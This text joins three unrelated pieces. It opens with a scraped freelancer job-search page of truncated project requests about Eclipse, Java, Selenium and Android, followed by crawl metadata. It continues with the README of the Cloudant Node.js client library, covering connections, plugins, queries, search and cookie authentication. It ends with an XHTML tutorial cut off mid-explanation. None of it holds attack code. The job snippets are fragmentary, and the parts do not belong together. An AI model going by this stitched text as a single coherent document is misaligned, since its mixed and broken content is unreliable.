Hi, Need help to complete some of the tasks of C Programming based project
...would be best from my experience, with a frayed out item being moved for ease of reading the other notes/events. In addition, I need it to have a few extra features: - Tying/Binding of notes. This would allow me to keep two or more events that I know happen immediately after or before another, to remain connected, and if I want to drag and drop one even/note
..
i will give you my eclipse project and you will give me the 2 of android studio projects without any error ( one without the GDPR + one with the GDPR added)
...version) 2. Data Driven Framework(Read test
Need a java class to call following url using apache httpclient and dump response on console. [kirjaudu nähdäksesi URL:n] I will need steps to run and test the class using eclipse in debug mode.
We need to transfer / Fix bugs in 2 functions between .jar files and a .java source code without damaging any functions in the original. On completion we request a Bug free source code preferably as an eclipse project. The professional would have to sign a Non Disclosure Agreement before getting the source code. To take a look, an earlier version
.. number
This is a short project, which requires excellent knowledge of Selenium, Cucumber, Eclipse and java. To fix some bugs.
This is a short project, which requires excellent knowledge of Selenium, Cucumber, Eclipse and java. To fix some bugs.
I'm looking for a book illustrator for children ages 3-10, 8 pages + binding.
.. o Maven or developed for Windows using Java. Write a code reading the useragent information from xlsx file and generate the output xlsx file with the browser, os, actual browser by comparing the general useragent string with the rows given in excel file. Then Write a testcase to compare
I can't seem to be able...the drop will still be disabled so i guess it does not really matter): ItemsSource="{Binding MyItem}" dd:DragDrop.IsDragSource="True" dd:DragDrop.IsDropTarget="True" dd:DragDrop.DropHandler="{Binding}" AllowDrop="True" any help will b...
I am looking for a helper for a few projects. 1. Moving a Joomla sit...similar), SQLAlchemy and AngularJS. The team is based in Warsaw (Poland), so if you would like to move there that might be a possibility in the future. This $ offer is not binding. I am contacting your get a sense of your abilities and to decide which project you could help with.
I am looking for a helper for a few projects. 1. Moving a Joomla s...similar), SQLAlchemy and AngularJS. The team is based in Warsaw (Poland), so if you would like to move there that might be a possibility in the future. This $ offer is not binding. I am contacting you to get a sense of your abilities and to decide which project you could help with.
I am looking for a helper for a few projects. 1. Moving a Joomla ...similar), SQLAlchemy and AngularJS. The team is based in Warsaw (Poland), so if you would like to move there that might be a possibility in the future. The $ offer below is not binding. I am contacting your get a sense of your abilities and to decide which project you can help with.
...to buy a high quality Bubble Shooter Source code. Like this: [kirjaudu nähdäksesi URL:n] Source code detail: 1. build with Unity/ Eclipse 2. integrated with Admob ads. 3. Facebook/ Social media button share I will need you to send a sample Apk to test before I buy because I do not want a low-quality source.
This project is a conversion of an existing Eclipse content management system to the CMS Made Simple version CMSMS 2.2.7 [kirjaudu nähdäksesi URL:n] [kirjaudu nähdäksesi URL:n] All of the existing files are zip compressed and will be provided. The selected Freelancer will be granted access to make the conversion
...- The application will send a notification each day to invite the user to participate to the survey I would like to have the .apk and a functionnal workspace (eclipse or android studio) Data specification : -A file with the questions ( [kirjaudu nähdäksesi URL:n]) -Files containing the answers for each day ( [kirjaudu nähdäksesi URL:n]) Question file format :...
...then sends the data in freq, magnitude format over USB. Sample rate should be as high as possible
So I have a source for a project i´d like to build and make fully running, currently i can´t get it to run in eclipse because there are some errors which i need help with. Previous knowledge with RSPS or anything similar would be great. I think this is fairly easy and wont take more than 15 mins of your time. if you can complete this task for me i
I need you to develop Selenium project for me. I would like this software to be developed for Windows using Java with Eclipse. Task 1 : It should open [kirjaudu nähdäksesi URL:n] from browser and aprove the page opened succesfully. Task 2 : Open the login page and login. Task 3 : Search ‘Apple’ keyword from search menu. Task 4 : Approve the search results...
...
This project is entitled as “Driver Call rejection with SMS using Android Mobiles” is developed using Android SDK as the development kit, Eclipse Classic as coding language and SQlite as backend database. The main objective of this project is to develop a mobile based application to avoid calls while driving. This application
I need...develop some software for me. I would like this software to be developed using Java. should be complete a pizza order form in java eclipse make a two files one for whole project and one for testing when we run the testing file it should be run and give output when we enter the data it should be work and cost should be calculate automatically
...[kirjaudu nähdäksesi URL:n] Please note: - Place your bid for the full project of 4.500 single articles - Your first bid is binding - Renegotiations are not allowed - Posts must be copy & pasted manually, no automatisation allowed - Each single post must be formatted (remove linebreaks, remove banner
Hello dear professionals, I require some quality as...will I need at which dosage and how can I keep the poweder as natural as possible, regarding it's ingredients. That would be something like emulsifying agents, flavours, binding agents, sweeteners, etc... More information will follow one we get in touch :) Many thanks in advance! Christopher
I need some changes to an existing website.
Currently, we develop a subscription video on demand platform. One thing, we need a proof of a letter from production for interesting their contents within the short movie, full-length movie, and tv show input our streaming platform. I need you to create a template for productions.
... .
.. look for a developer with knowledge in Spring and angular 5 I want a new Spring Project with Maven on Eclipse Sts The project offers several rest servives, and use Spring (not spring boot), Hibernate,JPA, Spring Security. The system offer two kinds of web services, public and privates(spring security) All web services must implemented in cors mode
Close Name: ProcessSimple Binding: SimpleServiceBinding Endpoint: [kirjaudu nähdäksesi URL:n] SoapAction: [kirjaudu nähdäksesi URL:n] Style: rpc Input: use: encoded namespace: [kirjaudu nähdäksesi URL:n] encodingStyle: [kirjaudu nähdäksesi URL:n] message:
Need... | https://www.fi.freelancer.com/job-search/eclipse-java-xml-data-binding/ | CC-MAIN-2018-30 | refinedweb | 1,250 | 64.41 |
In this C++ tutorial, you will learn about function passing types, two types of arguments passing in functions – passed by value and passed by reference are discussed here.
The arguments passed to a function can be performed in two ways:
- Passed By Value
- Passed By Reference
Passed By Value:
In the earlier chapter, all examples for the function with arguments were passed by value. Arguments passed by value are the copies of the values of variables and are passed to the function. The variables defined in the calling function are not passed in this manner.
For example:
int s=5, u=6;
int z;
z = exforsys(s,u)
would pass values as
int exforsys(int x, int y)
z = exforsys(5,6);
Thus, the copies of the values 5 and 6 are passed to the function definition and not the variables s and u. Thus, any changes in the variable x and y would not have any effect or change the variables s and u. Because s and u are not passed in this manner, only copies of the variables are passed to the function definition.
Passed By Reference:
Passed by reference indicates a contrast in that the variables are not passed by value. When a variable is passed by reference, it passes the variable to the function definition and not the copies of the value. Any changes to the variable in function definition would effect or reflect corresponding changes in the variables passed as reference.
The symbol used for denoting the passed by reference is & (ampersand).
For Example:
Suppose two integer variables x and y are defined in the calling function, the main program with values x=5 and y=4.
Suppose the function exforsys receives the value as passed by reference from this function it is defined and called as follows:
#include <iostream>
using namespace std;
void main( )
{
void exforsys(int&,int&);
//Function Declaration - & denotes passed by reference
int x=5,y=4;
exforsys(x,y);
cout << "n The output from Calling program is:";
cout << "n x=" << x;
cout << "n y=" << y;
}
void exforsys(int& s, int& u)
//Function Definition - & denotes passed by reference
{
s=s*10;
u=u*10;
}
In the above example, the reference arguments are indicated by the symbol ampersand & following the data type of the argument. In the above program, since the variables or arguments are passed by reference the assignment is as follows:
void exforsys(int& s, int& u)
exforsys(x, y);
The variable x and y are passed to the called function exforsys where it is associated with variables s and u. Whatever changes were made in the variable s and u effect or reflect on the variables x and y respectively and vice versa. Only in the above, the function multiplied the value of variable s and u by 10 which is reflected in the variable a and b. Thus, in this case, it has not returned any value by using return statement. The programmer must take careful notice and make use of the passed by reference concept by returning more than one value. By using the concept of passing by reference, it is possible to return more than one value.
The output of the above program would be
| https://www.exforsys.com/tutorials/c-plus-plus/function-passing-types.html | CC-MAIN-2021-21 | refinedweb | 538 | 62.21 |
"
[apologies for delay - there'd been lots of unrelated crap lately]
======================================================================
NOTE: as far as I'm concerned, that's a beginning of VFS-2.7 branch.
All that work will stay in a separate tree, with gradual merge back
into 2.6 once the things start settling down.
======================================================================.
Let's start with introducing a notion of propagation node; I consider
it only as a convenient way to describe the desired behaviour - it
almost certainly won't be a data structure in the final variant.
1) each p-node corresponds to a group of 1 or more vfsmounts.
2) there is at most 1 p-node containing a given vfsmount.
3) each p-node owns a possibly empty set of p-nodes and vfsmounts
4) no p-node or vfsmount can be owned by more than one p-node
5) only vfsmounts that are not contained in any p-nodes might be owned.
6) no p-node can own (directly or via intermediates) itself (i.e. the
graph of p-node ownership is a forest).
These guys define propagation:
a) if vfsmounts A and B are contained in the same p-node, events
propagate from A to B
b) if vfsmount A is contained in p-node p, vfsmount B is contained
in p-node q and p owns q, events propagate from A to B
c) if vfsmount A is contained in p-node p and vfsmount B is owned
by p, events propagate from A to B
d) propagation is transitive: if events propagate from A to B and
from B to C, they propagate from A to C.
In other words, members of the same p-node are equivalent and events anywhere
in p-node are propagated to all its slaves. Note that not any transitive
relation can be represented that way; it has to satisfy the following
condition:
* A->C and B->C => A->B or B->A
All propagation setups we are going to deal with will satisfy that condition.
How do we set them up?
* we can mark a subtree sharable. Every vfsmount in the subtree
that is not already in some p-node gets a single-element p-node of its
own.
* we can mark a subtree slave. That removes all vfsmounts in
the subtree from their p-nodes and makes them owned by said p-nodes.
p-nodes that became empty will disappear and everything they used to
own will be repossessed by their owners (if any).
* we can mark a subtree private. Same as above, but followed
by taking all vfsmounts in our subtree and making them *not* owned
by anybody.
Of course, namespace operations (clone, mount, etc.) affect that structure
and are affected by it (that's what it's for, after all).
1. CLONE_NS
That one is simple - we copy vfsmounts as usual
* if vfsmount A is contained in p-node p, then copy of A goes into
the same p-node
* if A is owned by p, then copy of A is also owned by p
* no new p-nodes are created.
2. mount
We have a new vfsmount A and want to attach it to mountpoint somewhere in
vfsmount B. If B does not belong to any p-node, everything is as usual; A
doesn't become a member or slave of any p-node and is simply attached to B.
If B belongs to a p-node p, consider all vfsmounts B1,...,Bn that get events
propagated from B and all p-nodes p1,...,pk that contain them.
* A gets cloned into n copies and these copies (A1,...,An) are attached
to corresponding points in B1,...,Bn.
* k new p-nodes (q1,...,qk) are created
* Ai is contained in qj <=> Bi is contained in qj
* qi owns qj <=> pi owns pj
* qi owns Aj <=> pi owns Bj
In other words, mount is propagated and propagation among the new vfsmounts
mirrors the propagation between mountpoints.
3. bind
bind works almost identically to mount; new vfsmount is created for every
place that gets propagation from mountpoint and propagation is set up to
mirror that between the mountpoints. However, there is a difference: unlike
the case of mount, vfsmount we were going to attach (say it, A) has some
history - it was created as a copy of some pre-existing vfsmount V. And
that's where the things get interesting:
* if V is contained in some p-node p, A is placed into the same
p-node. That may require merging one of the p-nodes we'd just created
with p (that will be the counterpart of the p-node containing the mountpoint).
* if V is owned by some p-node p, then A (or p-node containing A)
becomes owned by p.
4. rbind
rbind is recursive bind, so we just do binds for everything we had in
a subtree we are binding in obvious order; everything is described
by previous case.
5. umount
umount everything that gets propagation from victim.
6. mount --move
prohibited if what we are moving is in some p-node, otherwise we move
as usual to intended mountpoint and create copies for everything that
gets propagation from there (as we would do for rbind).
7. pivot_root
similar to --move
How to use all that stuff?
Example 1:
mount --bind /floppy /floppy
mount --make-shared /floppy
mount --rbind / /jail
<finish setting the jail up, umount whatever doesn't belong there,
etc.>
mount --make-slave /jail/floppy
and we get /floppy in chroot jail slave to /floppy outside - if somebody
(u)mounts stuff on it, that will get propagated to jail.
Example 2:
same, but with the namespaces instead of chroots.
Example 3:
same subtree visible (and kept in sync) in several places - just
mark it shared and rbind; it will stay in sync
Example 4:
have some daemon control the stuff in a subtree sharable with many
namespaces, chroots, etc. without any magic:
mark that subtree sharable
clone with CLONE_NS
parent marks that subtree slave
child keeps working on the tree in its private namespace.
There's a lot more applications of the same idea, of course - AFS and its
ilk, autofs-like stuff (with proper handling of MNT_EXPIRE and traps - see
below), etc., etc.
Areas where we still have to figure things out:
* MNT_EXPIRE handling done right; there are some fun ideas in that area,
but they still need to be done in more details (basically, lazy expire -
mount in a slave expiring into a trap that would clone a copy from master
when stepped upon).
* traps and their sharing. What we want is an ability to use the master/slave
mechanisms for *all* cross-namespace/cross-chroot issues in autofs, so that
daemon would only need to work with the namespace of its own and no nothing
about other instances.
* implementation ;-) It certainly looks reasonably easy to do; memory
demands are linear by number of vfsmounts involved and locking appears
to be solvable.
* whatever issues that might come up from MVFS demands (and AFS, | http://lwn.net/Articles/119232/ | crawl-002 | refinedweb | 1,173 | 66.88 |
This is the official Cloudant library for Node.js.
The best way to use the Cloudant client is to begin with your own Node.js project, and define this work as your dependency. In other words, put me in your package.json dependencies. The
npm tool can do this for you, from the command line:
$ npm install --save cloudant
Notice that your package.json will now reflect this package. Everything is working if you can run this command with no errors:
$ node -e 'require("cloudant"); console.log("Cloudant works");' Cloudant works
Now it's time to begin doing real work with Cloudant and Node.js.
Initialize your Cloudant connection by supplying your account and password, and supplying a callback function to run when everything is ready.
// Load the Cloudant library.var Cloudant = ;var me = 'nodejs'; // Set this to your own accountvar password = processenvcloudant_password;// Initialize the library with my account.var cloudant = ;cloudantdb;
Possible output (depending on your databases, of course):
All my databases: example_db, jasons_stuff, scores
Upper-case
Cloudant is this package you load using
require(), while lower-case
cloudant represents an authenticated, confirmed connection to your Cloudant service.
If you omit the "password" field, you will get an "anonymous" connection: a client that sends no authentication information (no passwords, no cookies, etc.)
To use the example code as-is, you must first install the
dotenv package from npm, then create a
.env file with your Cloudant credentials. For example:
npm install dotenv # Install ./node_modules/dotenv echo "/.env" >> .gitignore # Do not track .env in the revision history echo "cloudant_username=myaccount" > .env # Replace myaccount with your account name echo "cloudant_password='secret'" >> .env # Replace secret with your password
Here is simple but complete example of working with data:
;// Load the Cloudant library.var Cloudant = ;// Initialize Cloudant with settings from .envvar username = processenvcloudant_username || "nodejs";var password = processenvcloudant_password;var cloudant = ;// Remove any existing database called "alice".cloudantdb;
If you run this example, you will see:
You have inserted the rabbit. { ok: true, id: 'rabbit', rev: '1-6e4cb465d49c0368ac3946506d26335d' }
You can find a further CRUD example in the example directory of this project.
To use Cloudant,
require('cloudant') in your code. That will return the initialization function. Run that function, passing your account name and password, and an optional callback. (And see the security note about placing your password into your source code.
In general, the common style is that
Cloudant (upper-case) is the package you load; wheareas
cloudant (lower-case) is your connection to your database--the result of calling
Cloudant():
var Cloudant = ;var cloudant = ;
If you would prefer, you can also initialize Cloudant with a URL:
var Cloudant =var cloudant = ;
Running on Bluemix? You can initialize Cloudant directly from the
VCAP_SERVICES environment variable:
var Cloudant = ;var cloudant = ;
Note, if you only have a single Cloudant service then specifying the
instanceName isn't required.
You can optionally provide a callback to the Cloudant initialization function. This will make the library automatically "ping" Cloudant to confirm the connection and that your credentials work.
Here is a simple example of initializing asychronously, using its optional callback parameter:
var Cloudant = ;var me = 'nodejs'; // Replace with your account.var password = processenvcloudant_password;;
After initialization, in general, callback functions receive three arguments:
err- the error, if any
body- the http response body from Cloudant, if no error.
header- the http response header from Cloudant, if no error
The
ping() function is the only exception to this rule. It does not return headers since a "ping" is made from multiple requests to gather various bits of information.
By default, when you connect to your cloudant account (i.e. "me.cloudant.com"), you authenticate as the account owner (i.e. "me"). However, you can use Cloudant with any username and password. Just provide an additional "username" option when you initialize Cloudant. This will connect to your account, but using the username as the authenticated user. (And of course, use the appropriate password.)
var Cloudant = ;var me = "nodejs"; // Substitute with your Cloudant user account.var otherUsername = "jhs"; // Substitute with some other Cloudant user account.var otherPassword = processenvother_cloudant_password;;
If you use Cloudant Local, everything works exactly the same, except you provide a url parameter to indicate which server to use:
This library can be used with one of these
request plugins:
default- the default request library plugin. This uses Node.js's callbacks to communicate Cloudant's replies back to your app and can be used to stream data using the Node.js Stream API.
promises- if you'd prefer to write code in the Promises style then the "promises" plugin turns each request into a Promise. This plugin cannot be used to stream data because instead of returning the HTTP request, we are simply returning a Promise instead.
retry- on occasion, Cloudant's multi-tenant offerring may reply with an HTTP 429 response because you've exceed the number of API requests in a given amount of time. The "retry" plugin will automatically retry your request with exponential back-off. The 'retry' plugin can be used to stream data.
cookieauth- this plugin will automatically swap your Cloudant credentials for a cookie transparently for you. It will handle the authentication for you and ensure that the cookie is refreshed. The 'cookieauth' plugin can be used to stream data.
When initialising the Cloudant library, you can opt to use the 'promises' plugin:
var cloudant = ;var mydb = cloudantdb;
Then the library will return a Promise for every asynchronous call:
mydb;
When initialising the Cloudant library, you can opt to use the 'retry' plugin:
var cloudant = ;var mydb = cloudantdb;
Then use the Cloudant library normally. You may also opt to configure the retry parameters:
var cloudant = ;var mydb = cloudantdb;
When initialising the Cloudant library, you can opt to use the 'cookieauth' plugin:
var cloudant = ;var mydb = cloudantdb;mydb;
The above code will transparently call
POST /_session to exchange your credentials for a cookie and then call
GET /mydoc to fetch the document.
Subsequent calls to the same
cloudant instance will simply use cookie authentication from that point. The library will automatically ensure that the cookie remains
up-to-date by calling Cloudant on an hourly basis to refresh the cookie.
When initialising the Cloudant library, you can supply your own plugin function:
var {// don't do anything, just pretend that everything's ok.;};var cloudant = ;
Whenever the Cloudant library wishes to make an outgoing HTTP request, it will call your function instead of
request.
Cloudant is a wrapper around the Nano library and as such, Nano's documentation should be consulted for:
This library adds documentation for the following:
This feature interfaces with the Cloudant authorization API.
Use the authorization feature to generate new API keys to access your data. An API key is basically a username/password pair for granting others access to your data, without giving them the keys to the castle.
var Cloudant = ;var me = 'nodejs'; // Replace with your account.var password = processenvcloudant_password;var cloudant = ;cloudant;
Output:
API key: thandoodstrenterprourete Password for this key: Eivln4jPiLS8BoTxjXjVukDT Set security for animals { ok: true } Got security for animals { cloudant: { nobody: [], thandoodstrenterprourete: [ '_reader', '_writer' ], nodejs: [ '_reader', '_writer', '_admin', '_replicator' ] } }
See the Cloudant API for full details]()
To use an API key, initialize a new Cloudant connection, and provide an additional "key" option when you initialize Cloudant. This will connect to your account, but using the "key" as the authenticated user. (And of course, use the appropriate password associated with the API key.)
var Cloudant = ;var cloudant = ;
If you need to access your Cloudant database from a web application that is served from a domain other than your Cloudant account, you will need to enable CORS (Cross-origin resource sharing).
e.g. enable CORS from any domain:
cloudant;
or enable access from a list of specified domains:
cloudant;
or disable CORS access
cloudant;
or to fetch the current CORS configuration
cloudant;
Output:
{ enable_cors: true, allow_credentials: true, origins: [ '*' ] }
See for further details.
If you wish to access your Cloudant domain name (myaccount.cloudant.com) using a CNAME'd domain name (mysubdomain.mydomain.com) then you can instruct Cloudant to do so.
e.g. add a virtual host
cloudant;
e.g. view virtual host configuration
cloudant;
or delete a virtual host
cloudant;
This feature interfaces with Cloudant's query functionality. See the Cloudant Query documentation for details.
As with Nano, when working with a database (as opposed to the root server), run the
.db.use() method.
var db = cloudantdb
To see all the indexes in a database, call the database
.index() method with a callback function.
dbindex {if erthrow er;console;for var i = 0; i < resultindexeslength; i++console;resultshouldhaveawhichisanArray;;};
Example output:
The database has 3 indexes _all_docs (special): {"fields":[{"_id":"asc"}]} first-name (json): {"fields":[{"name":"asc"}]} last-name (json): {"fields":[{"name":"asc"}]}
To create an index, use the same
.index() method but with an extra initial argument: the index definition. For example, to make an index on middle names in the data set:
var first_name = name:'first-name' type:'json' index:fields:'name'dbindexfirst_name {if erthrow er;console;};
Output:
Index creation result: created
To query using the index, use the
.find() method.
db;
This feature interfaces with Cloudant's search functionality. See the Cloudant Search documentation for details.
First, when working with a database (as opposed to the root server), run the
.use() method.
var db = cloudantdb
In this example, we will begin with some data to search: a collection of books.
var books = [ {author:"Charles Dickens", title:"David Copperfield"}, {author:"David Copperfield", title:"Tales of the Impossible"}, {author:"Charles Dickens", title:"Great Expectation"} ] db.bulk({docs:books}, function(er) { if (er) { throw er; } console.log('Inserted all documents'); });
To create a Cloudant Search index, create a design document the normal way you would with Nano, the database
.insert() method.
To see all the indexes in a database, call the database
.index() method with a callback function.
// Note, you can make a normal JavaScript function. It is not necessary// for you to convert it to a string as with other languages and tools.var {if docauthor && doctitle// This looks like a book.;;}var ddoc =_id: '_design/library'indexes:books:analyzer: name: 'standard'index : book_indexer;db;
To query this index, use the database
.search() method. The first argument is the design document name, followed by the index name, and finally an object with your search parameters.
db;
This feature interfaces with Cloudant's geospatial features. See the Cloudant Geospatial documentation for details.
Begin with a database, and insert documents in GeoJSON format. Documents should have
"type" set to
"Feature" and also
"geometry" with a valid GeoJSON value. For example:
var db = cloudantdbvar cities ="_id":"Boston""type":"Feature""geometry":"type":"Point""coordinates": -71063611 42358056"_id":"Houston""type":"Feature""geometry":"type":"Point""coordinates": -95383056 29762778"_id":"Ruston""type":"Feature""geometry":"type":"Point""coordinates": -92640556 32529722;db;
To make a spatial index of these documents, create a design document with
"st_indexes" populated with a JavaScript indexing function.
// Note, you can make a normal JavaScript function. It is not necessary// for you to convert it to a string as with other languages and tools.var {if docgeometry && docgeometrycoordinates;};var ddoc =_id: '_design/city'st_indexes:city_points:index: city_indexer;db;
To query this index, use the database
.geo() method. The first argument is the design document name, followed by the index name, and finally an object with your search parameters.
// Find the city within 25km (15 miles) of Lexington, MA.var query =lat:42447222 lon:-71225radius:25000include_docs:true;db;
Cloudant supports making requests using Cloudant's cookie authentication.
var Cloudant = ;var username = 'nodejs'; // Set this to your own accountvar password = processenvcloudant_password;var cloudant = ;// A global variable to store the cookies. Of course, you can store cookies any way you wish.var cookies = {}// In this example, we authenticate using the same username/userpass as above.// However, you can use a different combination to authenticate as other users// in your database. This can be useful for using a less-privileged account.cloudant;
To reuse a cookie:
// (Presuming the "cookies" global from the above example is still in scope.)var Cloudant = ;var username = 'nodejs'; // Set this to your own accountvar other_cloudant = ;var alice = other_cloudantdbalice;
Getting current session:
// (Presuming the "cookie" global from the above example is still in scope.)var Cloudant = ;var username = 'nodejs'; // Set this to your own accountvar cloudant = ;cloudant;
If you wish to see further information about what the nodejs-cloudant library is doing, then its debugging output can be sent to the console by simply setting an environement variable:
export DEBUG=cloudant # then run your Node.js application
Debug messages will be displayed to indicate each of the Cloudant-specific function calls.
If you want to see all debug messages, including calls made by the underlying
nano library and HTTP requests/responses sent, then simply change the environment variable to
export DEBUG=cloudant,nano # then run your Node.js application
This will log every request and response as in the following example:
nano { method: 'POST', headers: { 'content-type': 'application/json', accept: 'application/json' }, uri: '', body: '{"a":1,"b":2}' } +3ms nano { err: null, body: { ok: true, id: '98f178cb8f4fe089f70fa4c92a0c84b1', rev: '1-25f9b97d75a648d1fcd23f0a73d2776e' }, headers: { 'x-couch-request-id': '8220322dee', location: '', date: 'Mon, 07 Sep 2015 13:06:01 GMT', 'content-type': 'application/json', 'cache-control': 'must-revalidate', 'strict-transport-security': 'max-age=31536000', 'x-content-type-options': 'nosniff;', connection: 'close', statusCode: 201, uri: '' } }
Note that credentials used in the requests are also written to the log.
Similarly, if you only want
nano-level debugging:
export DEBUG=nano # then run your Node.js application
The environment variable can also be defined on the same line as the Node.js script you are running e.g.:
DEBUG="*" node myscript.js
Besides the account and password options, you can add an optionsl
requestDefaults value, which will initialize Request (the underlying HTTP library) as you need it.
// Use an HTTP proxy to connect to Cloudant.var options ="account" : "my_account""password" : "secret""requestDefaults": "proxy": ""var cloudant = opts;// Now using the HTTP proxy...
Please check Request for more information on the defaults. They support features like cookie jar, proxies, ssl, etc.
A very important configuration parameter if you have a high traffic website and are using Cloudant is setting up the
pool.size. By default, the node.js https global agent (client) has a certain size of active connections that can run simultaneously, while others are kept in a queue. Pooling can be disabled by setting the
agent property in
requestDefaults to false, or adjust the global pool size using:
var https =httpsglobalAgentmaxSockets = 20
You can also increase the size in your calling context using
requestDefaults if this is problematic. refer to the Request documentation and examples for further clarification.
Here is an example of explicitly using the keep alive agent (installed using
npm install agentkeepalive), especially useful to limit your open sockets when doing high-volume access to Cloudant:
var HttpsAgent = HttpsAgent;var myagent =maxSockets: 50maxKeepAliveRequests: 0maxKeepAliveTime: 30000;var cloudant = account:"me" password:"secret" requestDefaults:agent:myagent;// Using Cloudant with myagent...
Cloudant is minimalistic but you can add your own features with
cloudant.request(opts, callback)
For example, to create a function to retrieve a specific revision of the
rabbit document:
{cloudant}
You can pipe in Cloudant like in any other stream. for example if our
rabbit document has an attachment with name
picture.png (with a picture of our white rabbit, of course!) you can pipe it to a
writable stream
See the Attachment Functions section for examples of piping to and from attachments.
This is an open-source library, published under the Apache 2.0 license. We very much welcome contributions to the project so if you would like to contribute (even if it's fixing a typo in the README!) simply
If you're not confident about being able to fix a problem yourself, or want to simply report an issue then please.
To join the effort developing this project, start from our GitHub page:
First clone this project from GitHub, and then install its dependencies using npm.
$ git clone $ npm install
We use npm to handle running the test suite. To run the comprehensive test suite, just run
npm test.
or after adding a new test you can run it individually (with verbose output) using:
npm test-verbose
This runs against a local "mock" web server, called Nock. However the test suite can also run against a live Cloudant service. I have registered "nodejs.cloudant.com" for this purpose.
$ npm test-live
Get the password from Jason somehow, and set it a file called
.env at the root of this project:
cloudant_password=thisisthepassword
If you work on this project plus another one, your best bet is to clone from GitHub and then link this project to your other one. With linking, your other project depends on this one; but instead of a proper install, npm basically symlinks this project into the right place.
Go to this project and "link" it into the global namespace (sort of an "export").
$ cd cloudant $ npm link /Users/jhs/.nvm/v0.10.25/lib/node_modules/cloudant -> /Users/jhs/src/cloudant/nodejs-cloudant
Go to your project and "link" it into there (sort of an "import").
$ cd ../my-project $ npm link cloudant /Users/jhs/src/my-project/node_modules/cloudant -> /Users/jhs/.nvm/v0.10.25/lib/node_modules/cloudant -> /Users/jhs/src/cloudant/nodejs-cloudant
Now your project has the dependency in place, however you can work on both of them in tandem.
DO NOT hard-code your password and commit it to Git. Storing your password directly in your source code (even in old commits) is a serious security risk to your data. Whoever gains access to your software will now also have read, write, and delete access to your data. Think about GitHub security bugs, or contractors, or disgruntled employees, or lost laptops at a conference. If you check in your password, all of these situations become major liabilities. (Also, note that if you follow these instructions, the
export command with your password will likely be in your
.bash_history now, which is kind of bad. However, if you input a space before typing the command, it will not be stored in your history.)
Here is simple but complete example of working with data:
var Cloudant =var me = 'nodejs' // Set this to your own accountvar password = processenvcloudant_password
If you run this example, you will see:
you have inserted the rabbit. { ok: true, id: 'rabbit', rev: '1-6e4cb465d49c0368ac3946506d26335. | https://www.npmjs.com/package/cloudant | CC-MAIN-2017-51 | refinedweb | 3,063 | 54.32 |
w_qrcode 0.1.6
w_qrcode #
A Flutter plugin to scanning. Ready for Android
权限: #
<uses-permission android:
<uses-permission android:
<uses-permission android:
安装 #
Add this to your package's pubspec.yaml file:
dependencies: w_qrcode: ^0.1.6
使用方式 #
import 'package:w_qrcode/w_qrcode.dart' as scanner; String barcode = await scanner.scan(); String photoScanResult = await scanner.scanPhoto();
许可 #
Distributed under the MIT license. See
LICENSE for more information.
关于 #
Created by hookou.
0.1.0 - (2019/10/16) #
0.1.1 - (2019/10/16) #
0.1.2 - (2019/10/16) width: 320 #
0.1.3 - (2019/10/16) width: 350 #
0.1.4 - (2019/10/31) ios报错修复 #
0.1.5 - (2019/11/01) #
0.1.6 - (2019/11/01) #
Use this package as a library
1. Depend on it
Add this to your package's pubspec.yaml file:
dependencies: w_qrcode: :w_qrcode/w_qrcode.dart';
We analyzed this package on Feb 13, 2020, and provided a score, details, and suggestions below. Analysis was completed with status completed using:
- Dart: 2.7.1
- pana: 0.13.5
- Flutter: 1.12.13+hotfix.7
Maintenance suggestions
Maintain an example. (-10 points)
Create a short demo in the
example/ directory to show how to use this package.
Common filename patterns include
main.dart,
example.dart, and
w_qrcode.dart. Packages with multiple examples should provide
example/README.md.
For more information see the pub package layout conventions. | https://pub.dev/packages/w_qrcode | CC-MAIN-2020-10 | refinedweb | 230 | 56.82 |
MCP3204/3208 Module¶
This module contains the driver for Microchip MCP3204/3208 analog to digital converter with SPI serial interface (datasheet).
Example:
from microchip.mcp3208 import MCP3208 ... mcp = mcp3208.MCP3208(SPI0, D17) value_0 = mcp.get_raw_data(True, 0) value_1 = mcp.get_raw_data(False, 2)
MCP3208 class¶
- class
MCP3208(spidrv, cs, clk = 400000)¶
Creates an instance of the MCP3208 class. This class allows the control of both MCP3204 and MCP3208 devices.
get_raw_data(single, channel)¶
Return the conversion result as an integer between 0 and 4095 (12 bit).
Input mode and channel are selected by single and channel parameters according to the following table.
Note
channel values marked with * are available for the MCP3208 only.
The digital output code is determined by the reference voltage Vref and the analog input voltage Vin:
Digital output code = 4096 * Vin / Vref | https://docs.zerynth.com/latest/official/lib.microchip.mcp3208/docs/official_lib.microchip.mcp3208_mcp3208.html | CC-MAIN-2020-24 | refinedweb | 134 | 60.11 |
In Matplotlib 1.5.1, the following warning will be displayed when FontManager() is instantiated and Matplotlib builds the font cache (e.g. when importing matplotlib.pyplot):
UserWarning: Matplotlib is building the font cache using fc-list. This may take a moment.
This should only appear the first time FontManager() is instantiated, but in some instances it is necessary to remove the previous matplotlib font cache to allow the new font cache build to be recognized. To do this, run the following from Canopy's IPython prompt:
import matplotlib as mpl font_cache_path = mpl.get_cachedir() + '/fontList.cache' %rm $font_cache_path
The warning should now appear only the next time that matplotlib.pyplot is imported, and not afterwards.
When Matplotlib 1.5.2 is released, we expect that this error will be suppressed.
xref: | https://support.enthought.com/hc/en-us/articles/207291386-Matplotlib-1-5-1-Font-Cache-Warning | CC-MAIN-2019-22 | refinedweb | 131 | 60.41 |
Being.
Why would you want to use XHTML?
Normally, you might upgrade to a new version of a technology for new functions, or because problems with the previous version have been fixed. However, XHTML is a fairly faithful copy of HTML 4, as far as tag functionalities go, so don't expect any fancy new tags.
The W3C states that the primary advantages of XHTML are extensibility and portability:
XML documents are required to be well-formed (with elements nested properly). With HTML, the addition of a new group of elements requires alteration of the entire DTD. In an XML-based DTD, a new set of elements simply needs to be internally consistent and well-formed to be added to an existing DTD. This greatly eases the development and integration of new collections of elements.
Non-desktop devices are being used more and more frequently to access Internet documents. In most cases, these devices do not have the computing power of a desktop computer and aren't designed to accommodate ill-formed HTML, as standard desktop browsers tend to do. In fact, if these non-desktop browsers do not receive well-formed markup (HTML or XHTML), they may simply fail to display the document.
An XHTML document consists of three main parts:
- DOCTYPE
- Head
- Body
The basic document structure is:
The
<head> area contains information about the document, such as ownership, copyright, and keywords; and the
<body> area contains the content of the document to be displayed.
Listing 1 shows you how this structure might be used in practice:
Listing 1. An XHTML example
Line 1: Since XHTML is HTML expressed in an XML document, it must include the initial XML declaration
<?xml version="1.0"?> at the top of the document.
Line 2: XHTML documents must be identified by one of three standard sets of rules. These rules are stored in a separate document called a Document Type Declaration (DTD), and are utilized to validate the accuracy of the XHTML document structure. The purpose of a DTD is to describe, in precise terms, the language and syntax allowed in XHTML.
